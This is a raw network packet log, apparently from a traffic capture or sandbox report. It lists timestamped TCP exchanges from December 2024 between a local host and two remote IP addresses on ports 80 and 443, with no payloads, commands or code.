                                                                                                                                                                                          Dec 18, 2024 09:07:20.378783941 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.379532099 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.379578114 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.379595995 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.379612923 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.379637957 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.379647970 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.380477905 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.380503893 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.380520105 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.380520105 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.380543947 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.380553007 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.381278992 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.381328106 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.381402016 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.381418943 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.381444931 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.381457090 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.382240057 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.382265091 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.382282972 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.382291079 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.382314920 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.382314920 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.383038998 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.383081913 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.383094072 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.383111000 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.383132935 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.383147955 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.383889914 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.383980036 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.383996010 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.384114981 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.384114981 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.384114981 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.384711981 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.384763956 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.384815931 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.384834051 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.384856939 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.384869099 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.385634899 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.385684967 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.385721922 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.385736942 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.385763884 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.385776043 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.386473894 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.386518002 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.386543036 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.386559963 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.386590958 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.386601925 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.387388945 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.387414932 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.387432098 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.387438059 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.387445927 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.387481928 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.388221979 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.388268948 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.388478994 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.388525009 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.388559103 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.388576984 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.388607025 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.388660908 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.389483929 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.389523029 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.389528036 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.389539957 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.389564991 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.389578104 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.390331030 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.390357018 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.390372038 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.390372992 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.390384912 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.390408993 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.391196966 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.391221046 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.391237020 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.391243935 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.391262054 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.391277075 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.392071009 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.392115116 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.392122030 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.392138958 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.392164946 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.392175913 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.392930984 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.392977953 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.393002987 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.393019915 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.393048048 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.393058062 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.393738985 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.393793106 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.393805027 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.393822908 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.393845081 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.393851995 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.394613981 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.394665956 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.394671917 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.394690037 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.394716978 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.394736052 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.395459890 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.395519972 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.395533085 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.395549059 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.395569086 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.395582914 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.396344900 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.396385908 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.396389961 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.396406889 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.396421909 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.396445036 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.397289991 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.397336006 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.397366047 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.397382975 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.397401094 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.397413969 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.398178101 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.398240089 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.398256063 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.398273945 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.398300886 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.398313046 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.398994923 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.399065018 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.558201075 CET49716443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:20.558263063 CET44349716104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.558363914 CET49716443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:20.558734894 CET49716443192.168.2.8104.21.23.76
                                                                                                                                                                                          Dec 18, 2024 09:07:20.558749914 CET44349716104.21.23.76192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.562316895 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.562360048 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.562376022 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.562383890 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.562422037 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.562422037 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.562498093 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.562562943 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.562567949 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.562583923 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.562614918 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.562849998 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.562889099 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.562903881 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.562920094 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.562944889 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.562959909 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.563707113 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.563751936 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.563781977 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.563796997 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.563818932 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.563837051 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.564481020 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.564523935 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.564532042 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.564547062 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.564570904 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.564584970 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.565325022 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.565363884 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.565372944 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.565387964 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.565408945 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.565431118 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.566291094 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.566313982 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.566329956 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.566334963 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.566348076 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.566366911 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.567121983 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.567162037 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.567188978 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.567204952 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.567225933 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.567239046 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.567979097 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.568018913 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.568058968 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.568073988 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.568094015 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.568108082 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.568819046 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.568859100 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.568895102 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.568909883 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.568933010 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.568945885 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.569689035 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.569725037 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.569744110 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.569758892 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.569780111 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.569792986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.570569038 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.570611000 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.570647001 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.570663929 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.570692062 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.570743084 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.571439028 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.571481943 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.571531057 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.571546078 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.571568012 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.571583986 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.572366953 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.572407007 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.572433949 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.572448969 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.572469950 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.572484016 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.573223114 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.573262930 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.573285103 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.573299885 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.573329926 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.573378086 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.574070930 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.574134111 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.574146032 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.574161053 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.574186087 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.574197054 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.574896097 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.574944973 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.574963093 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.574978113 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.575001955 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.575014114 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.575753927 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.575795889 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.575834036 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.575849056 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.575869083 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.575884104 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.576678991 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.576715946 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.576719999 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.576731920 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.576749086 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.576765060 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.577552080 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.577616930 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.577631950 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.577663898 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.578444004 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.578483105 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.578500986 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.578516006 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.578555107 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.579327106 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.579371929 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.579406023 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.579421043 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.579444885 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.579457045 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.580188036 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.580233097 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.580468893 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.580517054 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.580532074 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.580585957 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.580585957 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.581553936 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.581598997 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.581645966 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.581660986 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.581686020 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.581700087 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.582238913 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.582293034 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.582304001 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.582308054 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.582333088 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.582350969 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.583036900 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.583084106 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.583091974 CET4971480192.168.2.831.41.244.11
                                                                                                                                                                                          Dec 18, 2024 09:07:20.583100080 CET804971431.41.244.11192.168.2.8
                                                                                                                                                                                          Dec 18, 2024 09:07:20.583118916 CET4971480192.168.2.831.41.244.11
